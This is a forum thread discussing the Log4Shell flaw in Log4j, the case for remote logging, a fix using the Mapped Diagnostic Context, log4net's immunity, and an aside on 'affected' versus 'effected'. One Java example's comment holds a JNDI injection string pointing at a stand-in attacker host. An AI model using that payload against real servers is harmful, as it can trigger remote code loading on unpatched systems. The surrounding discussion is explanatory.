(the JNDI lookups being resolved after the rest of the message was populated was obviously the wrong place to do it for exactly this reason... that is really the core problem here, user-controlled JNDI is absolutely not acceptable given the capabilities, but, it's not like I've never written bad code... there but for the grace of god go I. Although again, that one is pretty obviously a problem just conceptually.)

Incidentally, though, "remote logging" really isn't inherently insane as a concept. It's conceptually reasonable that some kinds of important messages might want to be logged into Kafka or JDBC, and 15 years ago there wasn't the overwhelming consensus on "write to disk first, ingest it later" being the right way to get it there. If you want to be really really sure that certain super-important messages are committed, and you don't mind the latency, why not just poke it directly? Then you never have to worry about logs getting dropped on disk/etc and not making it there. And by running it through log4j you don't have to do anything special at an application level, you just define certain packages and message levels as being important and you don't have to re-invent the wheel on the message-building framework/etc. And sure log4j ended up having vulnerabilities, but your personal implementation may have vulnerabilities too - how sure are you about your string handling and escaping, could a message spoof what looks like a valid log entry? That's a common one. It just turns out that JNDI was a vastly bigger attack surface than initially realized...
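
To make the shape of it concrete, a rough sketch of the vulnerable pattern on pre-patch Log4j 2 (class and method names are made up):

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    // The logging call itself is completely ordinary; the problem was that
    // vulnerable Log4j 2 versions scanned the formatted message for ${...}
    // lookups, so attacker-controlled input became a JNDI fetch.
    public class LoginAudit {
        private static final Logger LOG = LogManager.getLogger(LoginAudit.class);

        public void recordFailedLogin(String userName) {
            // If userName is "${jndi:ldap://attacker.example/a}", a vulnerable
            // Log4j resolves the lookup instead of just printing the string.
            LOG.warn("Failed login attempt for user {}", userName);
        }
    }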


Also, btw, just for performance reasons - I wouldn't put a JNDI call into a log message anyway - even calling to somewhere local, it's not entirely free, and logging is highly performance-sensitive. I'm not sure if it's HTTP-based or what, maybe it's memory-based if local, but whatever it is, doing it thousands of times a second is wasteful.

It's not a "get the container name" call, it's a generic JNDI call, those values could change and the output probably can't be cached... so just for performance's sake I would get those values at application startup and then put them into the Mapped Diagnostic Context, which can be accessed via log4j pattern formatters. That way you're not calling out for every log message.
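
Roughly like this (the keys and the source of the values are just examples):

    import org.apache.logging.log4j.ThreadContext;

    // Resolve the instance/container identity once at startup and stash it
    // in the context; the layout pulls it out with %X{container} etc.
    // ThreadContext is thread-local, so in a threaded app you'd set this per
    // thread or enable the inheritable context map.
    public final class LoggingContextInit {
        public static void init(String containerName, String instanceId) {
            ThreadContext.put("container", containerName);
            ThreadContext.put("instance", instanceId);
        }
    }
Then a pattern like %d %X{container} %X{instance} %-5p %c - %m%n gets those values onto every line without any per-message lookup.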


If I understand this correctly, the log4j problem wasn't a bug but a Java feature in the wrong place.


Does anyone know if log4net, the .NET version of log4j, is effected?


log4net was never affected by the log4shell vulnerability, as there is no .NET equivalent for JNDI [0]. JNDI is remote code execution as a service, and the idea that that would be generally useful is an entirely Java one.

Though if you are concerned about using a library with "log4" in the name and/or shuffled into the Apache graveyard in .NET, there are lots of useful replacement libraries. Microsoft.Extensions.Logging is "out of the box" in modern .NET and a simple NuGet away in older frameworks.

[0] https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Inte...


Hey, English is not my first language. Is "effected" here the right word to use or would "affected" be the correct term? I see English speaking people use these two interchangeably so much online that I am starting to doubt what I learned in my English courses.


Native English speakers mostly learned English by sound alone, so many such speakers regularly mix up words which sound very similar, like it’s/its, effected/affected, site/sight, etc. Non-native speakers have instead frequently learned by mostly reading, and may therefore instead be lacking in correct pronunciation, but have no problem in distinguishing “it’s” and “its”, for example.


Affected would have been more correct.

"Affected means that something was influenced or changed (e.g. the lyrics affected him).

Effected means that something was brought about or facilitated (e.g. she effected the proposed changes)."

It's definitely a subtle distinction, and, similarly, affect and effect tend to be mixed up as well

- from https://prowritingaid.com/affected-vs-effected#:~:text=To%20....

I will also recommend the book Uncovering The Logic of English, which is primarily aimed at native (American) English speakers but has several nods to English-as-a-second-language lessons.

Cheers! Signed, an American who was corrected by his father quite often and now has an ear for these things.


"Affected" is correct. Fortunately most of the time you can use the wrong word and still be understood.

Even with English as my first language, and as a life-long pedant, I still have to stop and think each time I use one or the other.


"Affected" is the correct term here. People do use those wrong all the time. Honestly it's not always that they don't know which one (well ok it probably is, but doesn't have to be), but I find typing comments online my brain interchanges some things like that even though I know which one is correct.


“affected” should have been used. It is a common mistake to confuse the two.


It should be “affected”


> We are all in this together.

The last line from the article, and my favorite line from (the movie) Brazil, which seems fitting?


Long live SaaS products, no longer our problem hahaha... Going to cry in a corner.



